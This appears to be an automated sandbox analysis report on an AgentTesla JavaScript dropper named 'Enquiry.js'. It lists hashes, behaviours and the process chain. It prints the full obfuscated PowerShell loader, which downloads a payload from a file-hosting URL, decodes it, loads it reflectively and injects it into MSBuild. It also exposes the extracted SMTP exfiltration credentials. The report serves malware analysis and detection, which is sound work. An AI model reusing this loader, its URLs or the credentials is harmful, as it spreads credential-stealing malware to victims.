Analysis
-
max time kernel
120s -
max time network
139s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
29-11-2024 12:47
Static task
static1
Behavioral task
behavioral1
Sample
Enquiry.js
Resource
win7-20240903-en
General
-
Target
Enquiry.js
-
Size
225KB
-
MD5
90480a98c3f20658dcc43fa6db7bd562
-
SHA1
1a379838129904188cd08ffe9c645a5daba3bea5
-
SHA256
7c9332df56fc0061fc832475af43d1c94636a5f8710011b3952dc98716f20899
-
SHA512
05f8c16e4ec8af3939a7fea5b8e4adde852ba00e5b0513aedaad7afeaf556741094fff75681bdbe070e3de62fc9f3c76939271c004a4bf308e38ea20126b611d
-
SSDEEP
6144:C2KZgSq+QdBA5gC/2KZgSq+QdR2KZgSq+QdBA5gC/2KZgSq+Qdt:C2KZgSq+QdBA5gC/2KZgSq+QdR2KZgSm
Malware Config
Extracted
https://1016.filemail.com/api/file/get?filekey=0RUgbZ-8FbUsLkmTHKk7vmioQRpHGD8qVMkgf-v_Yna_Wu4TdrJepse70JUd-j9UMfry&pk_vid=e0109638c9bfb9571732794374a1ff6c
https://1016.filemail.com/api/file/get?filekey=0RUgbZ-8FbUsLkmTHKk7vmioQRpHGD8qVMkgf-v_Yna_Wu4TdrJepse70JUd-j9UMfry&pk_vid=e0109638c9bfb9571732794374a1ff6c
Extracted
Protocol: smtp- Host:
mail.detarcoopmedical.com - Port:
587 - Username:
[email protected] - Password:
To$zL%?nhDHN
Extracted
agenttesla
Protocol: smtp- Host:
mail.detarcoopmedical.com - Port:
587 - Username:
[email protected] - Password:
To$zL%?nhDHN - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Agenttesla family
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid Process 8 3904 powershell.exe 24 3904 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepid Process 4752 powershell.exe 3904 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
wscript.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation wscript.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 26 ip-api.com -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid Process procid_target PID 3904 set thread context of 8 3904 powershell.exe 93 -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
MSBuild.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.exeMSBuild.exepid Process 4752 powershell.exe 4752 powershell.exe 3904 powershell.exe 3904 powershell.exe 3904 powershell.exe 3904 powershell.exe 8 MSBuild.exe 8 MSBuild.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exeMSBuild.exedescription pid Process Token: SeDebugPrivilege 4752 powershell.exe Token: SeDebugPrivilege 3904 powershell.exe Token: SeDebugPrivilege 8 MSBuild.exe -
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
wscript.exepowershell.exepowershell.exedescription pid Process procid_target PID 3036 wrote to memory of 4752 3036 wscript.exe 82 PID 3036 wrote to memory of 4752 3036 wscript.exe 82 PID 4752 wrote to memory of 3904 4752 powershell.exe 84 PID 4752 wrote to memory of 3904 4752 powershell.exe 84 PID 3904 wrote to memory of 4452 3904 powershell.exe 92 PID 3904 wrote to memory of 4452 3904 powershell.exe 92 PID 3904 wrote to memory of 4452 3904 powershell.exe 92 PID 3904 wrote to memory of 8 3904 powershell.exe 93 PID 3904 wrote to memory of 8 3904 powershell.exe 93 PID 3904 wrote to memory of 8 3904 powershell.exe 93 PID 3904 wrote to memory of 8 3904 powershell.exe 93 PID 3904 wrote to memory of 8 3904 powershell.exe 93 PID 3904 wrote to memory of 8 3904 powershell.exe 93 PID 3904 wrote to memory of 8 3904 powershell.exe 93 PID 3904 wrote to memory of 8 3904 powershell.exe 93
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\Enquiry.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3036 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $pedantice = 'JABkAGkAcwB0AHUAcgBiAGEAcgAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwAxADAAMQA2AC4AZgBpAGwAZQBtAGEAaQBsAC4AYwBvAG0ALwBhAHAAaQAvAGYAaQBsAGUALwBnAGUAdAA/AGYAaQBsAGUAawBlAHkAPQAwAFIAVQBnAGIAWgAtADgARgBiAFUAcwBMAGsAbQBUAEgASwBrADcAdgBtAGkAbwBRAFIAcABIAEcARAA4AHEAVgBNAGsAZwBmAC0AdgBfAFkAbgBhAF8AVwB1ADQAVABkAHIASgBlAHAAcwBlADcAMABKAFUAZAAtAGoAOQBVAE0AZgByAHkAJgBwAGsAXwB2AGkAZAA9AGUAMAAxADAAOQA2ADMAOABjADkAYgBmAGIAOQA1ADcAMQA3ADMAMgA3ADkANAAzADcANABhADEAZgBmADYAYwAgACcAOwAkAGcAdQBpAG4AZABhAGwAZQB0AGEAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAbAB1AGkAcgAgAD0AIAAkAGcAdQBpAG4AZABhAGwAZQB0AGEALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAZABpAHMAdAB1AHIAYgBhAHIAKQA7ACQAcABzAHkAbABsAG8AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABsAHUAaQByACkAOwAkAGEAcABlAHQAaQBiAGkAbABpAGQAYQBkAGUAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAkAGEAdgBpAG4AYwB1ACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAkAGcAbwByAGQAdQBjAGgAbwAgAD0AIAAkAHAAcwB5AGwAbABvAC4ASQBuAGQAZQB4AE8AZgAoACQAYQBwAGUAdABpAGIAaQBsAGkAZABhAGQAZQApADsAJABhAHIAYQBwAGkAbgBnAGEAIAA9ACAAJABwAHMAeQBsAGwAbwAuAEkAbgBkAGUAeABPAGYAKAAkAGEAdgBpAG4AYwB1ACkAOwAkAGcAbwByAGQAdQBjAGgAbwAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAAkAGEAcgBhAHAAaQBuAGcAYQAgAC0AZwB0ACAAJABnAG8AcgBkAHUAYwBoAG8AOwAkAGcAbwByAGQAdQBjAGgAbwAgACsAPQAgACQAYQBwAGUAdABpAGIAaQBsAGkAZABhAGQAZQAuAEwAZQBuAGcAdABoADsAJABwAGUAcgBpAHMAcwBvAGwAbwBnAGkAYQAgAD0AIAAkAGEAcgBhAHAAaQBuAGcAYQAgAC0AIAAkAGcAbwByAGQAdQBjAGgAbwA7ACQAbQBlAHQAaABvAGQAaQBjAGEAbQBlAG4AdABlACAAPQAgACQAcABzAHkAbABsAG8ALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAZwBvAHIAZAB1AGMAaABvACwAIAAkAHAAZQByAGkAcwBzAG8AbABvAGcAaQBhACkAOwAkAGMAbwByAHIAaQBkAG8AIAA9ACAALQBqAG8AaQBuACAAKAAkAG0AZQB0AGgAbwBkAGkAYwBhAG0AZQBuAHQAZQAuAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAgAH0AKQBbAC0AMQAuAC4ALQAoACQAbQBlAHQAaABvAGQAaQBjAGEAbQBlAG4AdABlAC4ATABlAG4AZwB0AGgAKQBdADsAJAB0AGEAbABpAG0AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYwBvAHIAcgBpAGQAbwApADsAJABvAGkAcgBhAGQAYQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJAB0AGEAbABpAG0AKQA7ACQAcABlAGMAaABhACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFYAQQBJACcAKQA7ACQAcABlAGMAaABhAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAEAAKAAnAHQAeAB0AC4AOAA4ADIALwBlAGwAaQBmAC8AcgB0AC4AbQBvAGMALgBhAHkAYQBrAGkAbAByAGUAeQBhAGgAbABhAHQALwAvADoAcwBwAHQAdABoACcALAAgACcAJABlAG4AZgB1AG4AYQBkAG8AJwAsACAAJwAkAGUAbgBmAHUAbgBhAGQAbwAnACwAIAAnACQAZQBuAGYAdQBuAGEAZABvACcALAAgACcATQBTAEIAdQBpAGwAZAAnACwAIAAnACQAZQBuAGYAdQBuAGEAZABvACcALAAgACcAJABlAG4AZgB1AG4AYQBkAG8AJwAsACcAJABlAG4AZgB1AG4AYQBkAG8AJwAsACcAJABlAG4AZgB1AG4AYQBkAG8AJwAsACcAJABlAG4AZgB1AG4AYQBkAG8AJwAsACcAJABlAG4AZgB1AG4AYQBkAG8AJwAsACcAJABlAG4AZgB1AG4AYQBkAG8AJwAsACcAMQAnACwAJwAkAGUAbgBmAHUAbgBhAGQAbwAnACkAKQA7AA==';$torvamento = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($pedantice));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $torvamento2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4752 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$disturbar = 'https://1016.filemail.com/api/file/get?filekey=0RUgbZ-8FbUsLkmTHKk7vmioQRpHGD8qVMkgf-v_Yna_Wu4TdrJepse70JUd-j9UMfry&pk_vid=e0109638c9bfb9571732794374a1ff6c ';$guindaleta = New-Object System.Net.WebClient;$luir = $guindaleta.DownloadData($disturbar);$psyllo = [System.Text.Encoding]::UTF8.GetString($luir);$apetibilidade = '<<BASE64_START>>';$avincu = '<<BASE64_END>>';$gorducho = $psyllo.IndexOf($apetibilidade);$arapinga = $psyllo.IndexOf($avincu);$gorducho -ge 0 -and $arapinga -gt $gorducho;$gorducho += $apetibilidade.Length;$perissologia = $arapinga - $gorducho;$methodicamente = $psyllo.Substring($gorducho, $perissologia);$corrido = -join ($methodicamente.ToCharArray() | ForEach-Object { $_ })[-1..-($methodicamente.Length)];$talim = [System.Convert]::FromBase64String($corrido);$oirada = [System.Reflection.Assembly]::Load($talim);$pecha = [dnlib.IO.Home].GetMethod('VAI');$pecha.Invoke($null, @('txt.882/elif/rt.moc.ayakilreyahlat//:sptth', '$enfunado', '$enfunado', '$enfunado', 'MSBuild', '$enfunado', '$enfunado','$enfunado','$enfunado','$enfunado','$enfunado','$enfunado','1','$enfunado'));"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3904 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:4452
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:8
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5f41839a3fe2888c8b3050197bc9a0a05
SHA10798941aaf7a53a11ea9ed589752890aee069729
SHA256224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA5122acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699
-
Filesize
64B
MD5a6c9d692ed2826ecb12c09356e69cc09
SHA1def728a6138cf083d8a7c61337f3c9dade41a37f
SHA256a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b
SHA5122f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82